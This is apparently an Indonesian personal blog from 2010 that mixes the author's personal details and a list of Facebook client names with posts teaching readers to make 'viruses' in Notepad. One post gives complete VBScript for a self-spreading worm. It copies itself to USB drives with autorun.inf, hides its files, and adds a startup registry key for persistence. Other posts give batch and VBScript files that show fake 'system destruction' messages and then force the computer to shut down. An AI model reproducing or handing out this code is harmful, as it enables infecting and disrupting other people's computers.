Data Pribadi Saya

Nama Pemilik: Ig Fandy Jayanto

Alamat Rumah: Seputih Banyak, Kab. Lampung Tengah


Riwayat Pendidikan:

SD N 1 Sumber Baru
SMP N 1 Seputih Banyak
SMA Paramarta 1 {jurusan Ipa 1}
S1 di UM Metro {jurusan FKIP Matematika}

sedang menempuh pendidikan di Universitas Lampung (Unila)

Pekerjaan:
Guru di SMP Paramarta 1 Seputih Banyak
.........
.........
.........


Senin, 06 Desember 2010

UPDATE FACEBOOK


UPDATE FACEBOOK

BlackBerry
iPhone
android
Palm
T-Mobile Sidekick
Bilah Alat Facebook untuk Firefox
Windows Phone
Windows Phone
Facebook Desktop Client
Pengekspor Facebook untuk iPhoto
koprol
ovi by nokia
Windows® 7 Smartphones
Foursquare
Laptop Dewek
Snaptu
Faсebook for iPad
HP Dewek
Hotspot Unsri
Kampus GM-IPB
iPad Apple
BlackBerry for Rian
Web Rian
PantaiJodoh.COM

Jumat, 03 Desember 2010

Virus yang bikin gelap


Virus yang bikin gelap
This is a featured page
copy paste script di bawah ini, pastenya di notepad dan simpan dengan type .vbs


on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll
.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll
.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Main\Window Title","JATIMCREW was HERE"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Membuat Virus dengan Notepad (2)This is a featured page


Membuat Virus dengan Notepad (2)This is a featured page
Membuat virus shutdown dengan notepad

Bayangkan, bila anda membuat virus yang otomatis mengshutdown computer yang terinfeksi, dengan disertai pesan apa saja selama 30 detik sebelum computer tershutdown.

let`s begin!

langkah-langah:
1. buka notepad
2 copy+paste yang bercetak tebal dibawah ini:

option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 1
wshshell.run "shutdown -s -c INDOCRACKER.WETPAINT.COM"
next

untuk mendownload script, klik disini

3. ganti INDOCRACKER.WETPAINT.COM dengan pesan apa saja yang anda inginkan.
Ingat! tanpa spasi
4. save file dengan nama jangan di klik.vbs (pastikan ”save as type” diubah ke ”all files”

sekarang, kita buat penawarnya:

1. buka notepad
2 copy+paste yang bercetak tebal dibawah ini:

option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 1
wshshell.run "shutdown -a"
next

3. save file dengan nama penawar.vbs (pastikan ”save as type” diubah ke ”all files”

Silahkan coba virus yang sudah anda buat.

Membuat Shortcut Untuk Mengkunci Komputer




Terkadang saat kita menjalankan komputer ada hal yang penting yang harus ditangani. Anda tergesa-gesa meninggalkan komputer. Padahal komputer belum dikunci. Ada kemungkinan data kita bisa dilihat dan dijahili seseorang. Ada sebuah tips yang bisa anda terapkan agar anda bisa mengkunci komputer Anda tanpa menekan CTRL+ALT+DEL atau menjalankan screen saver.

Cara yang paling mudah adalah membuat shortcut ke file yang berfungsi untuk mengkunci windows. Langkah-langkahnya adalah :

Buat shortcut ke desktop anda dengan mengklik kanan area desktop New > Shortcut



Maka akan keluar Wizard pembuatan Shortcut baru. Pada box, masukkan parameter berikut
rundll32.exe user32.dll,LockWorkStation



selanjutnya tinggal tekan saja Next. Pada box berikutnya tinggal anda ketikkan nama shortcut yang anda inginkan.



Nah shortcut ini sudah jadi. Bisa juga anda permanis dengan mengganti ikon sesuai dengan keinginan anda. Caranya adalah dengan mengklik kanan Shortcut tadi lalu pilih Properties. Selanjutnya tinggal anda klik tombol Change Icon



Selanjutnya tinggal anda masukkan file icon favorit anda dengan mengklik Browse. Setelah selesai tinggal saja anda tekan OK. Nah sekarang shortcut yang anda buat tadi sudah mempunyai icon menurut selera anda. Anda bisa juga menggunakan kombinasi keyboard untuk menjalankan shorcut Kunci Komputer ini. Dalam dialog Shorcut Key pada properties shorcut yang anda buat tadi, tinggal  anda tekan kombinasi tombol sesuai dengan keinginan anda. Jadi bila komputer anda tinggalkan, tinggal tekan saja kombinasi tombol yang sudah anda tentukan tadi...Well done

Sabtu, 06 November 2010

Membuat Virus dengan notepad (5)


Membuat Virus dengan notepad (5)
This is a featured page
Virus notepad yang akan kita buat ini aman dan mudah. Aman, karena hanya berefek me-Shutdown komputer.Tapi, kelebihan virus ini adalah, sebelum komputer tershutdown, akan ada pesan-pesan yang menyatakan bahwa
seluruh jaringan komputer anda telah kena virus. Silahkan copy + paste bahasa pemograman dibawah ini (yang berteks putih):



cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BERSIAP-SIAP MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!<brstart /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo HI, SAYA ADALAH MEMBER DARI INDOCRACKER
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo LENGKAPNYA INDOCRACKER.
WETPAINT.COM.
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo COMING UP NEXT……. :-)
echo BY INDOCRACKER MEMBER
echo A VERY VERY SMART BOY
echo INDOCRACKER.
WETPAINT.COM
echo CALL ME YACHH +6284323xxxxxx SMS JUG BOLEH LHO :-D
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo SALAM DARI SI GANTENG : INDOCRACKER MEMBER.
echo INDOCRACKER.WETPAINT.COM
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “BERTAUBATLAH, BACK TO UR GOD.”


klik disini untuk mendownload script diatas


Simpan file dengan nama Indocracker.bat